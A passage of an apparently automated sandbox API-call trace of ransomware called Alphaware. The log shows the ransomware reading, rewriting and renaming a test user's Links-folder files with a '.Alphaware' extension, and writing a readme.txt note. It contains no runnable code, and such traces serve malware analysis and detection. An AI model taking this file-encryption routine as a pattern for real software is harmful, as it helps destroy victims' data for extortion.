lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x827d85a0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x827d85a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x827d85a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0081.618] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14fa0b00, ftCreationTime.dwHighDateTime=0x1d96e15, ftLastAccessTime.dwLowDateTime=0x36702850, ftLastAccessTime.dwHighDateTime=0x1d9754a, ftLastWriteTime.dwLowDateTime=0x82d0d5c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1df08, dwReserved0=0x0, dwReserved1=0x0, cFileName="SjIEHWNzBPbEPK.ppt.Alphaware", cAlternateFileName="SJIEHW~1.ALP")) returned 1 [0081.619] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2160a710, ftCreationTime.dwHighDateTime=0x1d9699b, ftLastAccessTime.dwLowDateTime=0x172cf9a0, ftLastAccessTime.dwHighDateTime=0x1d96f5f, ftLastWriteTime.dwLowDateTime=0x82d33720, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x199f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z3ZXfX.bmp.Alphaware", cAlternateFileName="Z3ZXFX~1.ALP")) returned 1 [0081.619] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54550780, ftCreationTime.dwHighDateTime=0x1d969c6, ftLastAccessTime.dwLowDateTime=0x22860c70, ftLastAccessTime.dwHighDateTime=0x1d973dc, ftLastWriteTime.dwLowDateTime=0x82d7f9e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10c88, dwReserved0=0x0, dwReserved1=0x0, cFileName="_7pBY2-omnUcu.gif.Alphaware", cAlternateFileName="_7PBY2~1.ALP")) returned 1 [0081.619] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54550780, ftCreationTime.dwHighDateTime=0x1d969c6, ftLastAccessTime.dwLowDateTime=0x22860c70, ftLastAccessTime.dwHighDateTime=0x1d973dc, ftLastWriteTime.dwLowDateTime=0x82d7f9e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10c88, dwReserved0=0x0, dwReserved1=0x0, cFileName="_7pBY2-omnUcu.gif.Alphaware", cAlternateFileName="_7PBY2~1.ALP")) returned 0 [0081.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0081.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0081.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0081.619] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.619] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0081.619] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0081.619] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x36e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0081.619] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ab6db0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x5fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive.lnk", cAlternateFileName="")) returned 1 [0081.619] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0081.619] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0081.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0081.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0081.620] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\desktop.ini", dwFileAttributes=0x80) returned 1 [0081.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0081.620] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x25b4540 | out: lpFileInformation=0x25b4540*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x244)) returned 1 [0081.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0081.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0081.620] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\links\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0081.620] ReadFile (in: hFile=0x254, lpBuffer=0x25b49b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25b49b8*, lpNumberOfBytesRead=0x23eb38*=0x244, lpOverlapped=0x0) returned 1 [0081.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0081.638] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\links\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0081.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0081.640] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82dcbca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0)) returned 1 [0081.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0081.640] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Links\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\links\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\Links\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\links\\desktop.ini.alphaware")) returned 1 [0081.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0081.641] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\links\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0081.643] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\Desktop.lnk", dwFileAttributes=0x80) returned 1 [0081.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0081.652] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\desktop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2638158 | out: lpFileInformation=0x2638158*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1c7)) returned 1 [0081.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0081.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0081.653] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\desktop.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0081.653] ReadFile (in: hFile=0x254, lpBuffer=0x2638550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2638550*, lpNumberOfBytesRead=0x23eb38*=0x1c7, lpOverlapped=0x0) returned 1 [0081.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0081.674] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\desktop.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0081.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0081.676] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\desktop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82e17f60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x334)) returned 1 [0081.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0081.676] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Links\\Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\desktop.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\Links\\Desktop.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\links\\desktop.lnk.alphaware")) returned 1 [0081.677] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\Downloads.lnk", dwFileAttributes=0x80) returned 1 [0081.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0081.678] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\Downloads.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\downloads.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24a4bd8 | out: lpFileInformation=0x24a4bd8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b2df0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x36e)) returned 1 [0081.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0081.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0081.678] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\Downloads.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\downloads.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0081.678] ReadFile (in: hFile=0x254, lpBuffer=0x24a5188, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24a5188*, lpNumberOfBytesRead=0x23eb38*=0x36e, lpOverlapped=0x0) returned 1 [0081.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0081.698] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\Downloads.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\downloads.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0081.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0081.700] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\Downloads.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\downloads.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82e64220, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x560)) returned 1 [0081.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0081.700] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Links\\Downloads.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\downloads.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\Links\\Downloads.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\links\\downloads.lnk.alphaware")) returned 1 [0081.701] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\OneDrive.lnk", dwFileAttributes=0x80) returned 1 [0081.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0081.702] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\OneDrive.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\onedrive.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25267a8 | out: lpFileInformation=0x25267a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf2ab6db0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x5fd)) returned 1 [0081.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0081.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0081.702] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\OneDrive.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\onedrive.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0081.702] ReadFile (in: hFile=0x254, lpBuffer=0x2526fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2526fe8*, lpNumberOfBytesRead=0x23eb38*=0x5fd, lpOverlapped=0x0) returned 1 [0081.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0081.723] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\OneDrive.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\onedrive.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0081.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0081.725] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\OneDrive.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\onedrive.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ab6db0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0x82e8a380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8c8)) returned 1 [0081.725] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0081.725] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Links\\OneDrive.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\onedrive.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\Links\\OneDrive.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\links\\onedrive.lnk.alphaware")) returned 1 [0081.726] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\RecentPlaces.lnk", dwFileAttributes=0x80) returned 1 [0081.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0081.726] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\recentplaces.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25a99c0 | out: lpFileInformation=0x25a99c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8b06e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x16b)) returned 1 [0081.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0081.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0081.726] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\recentplaces.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0081.727] ReadFile (in: hFile=0x254, lpBuffer=0x25a9d78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25a9d78*, lpNumberOfBytesRead=0x23eb38*=0x16b, lpOverlapped=0x0) returned 1 [0081.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0081.746] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\recentplaces.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0081.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0081.748] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\recentplaces.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82ed6640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2b4)) returned 1 [0081.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0081.748] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\keecfmwgj\\links\\recentplaces.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\Links\\RecentPlaces.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\links\\recentplaces.lnk.alphaware")) returned 1 [0081.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0081.749] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82ed6640, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82ed6640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.749] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82dcbca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0081.749] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82e17f60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x334, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk.Alphaware", cAlternateFileName="DESKTO~2.ALP")) returned 1 [0081.749] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82e64220, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk.Alphaware", cAlternateFileName="DOWNLO~1.ALP")) returned 1 [0081.749] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ab6db0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0x82e8a380, 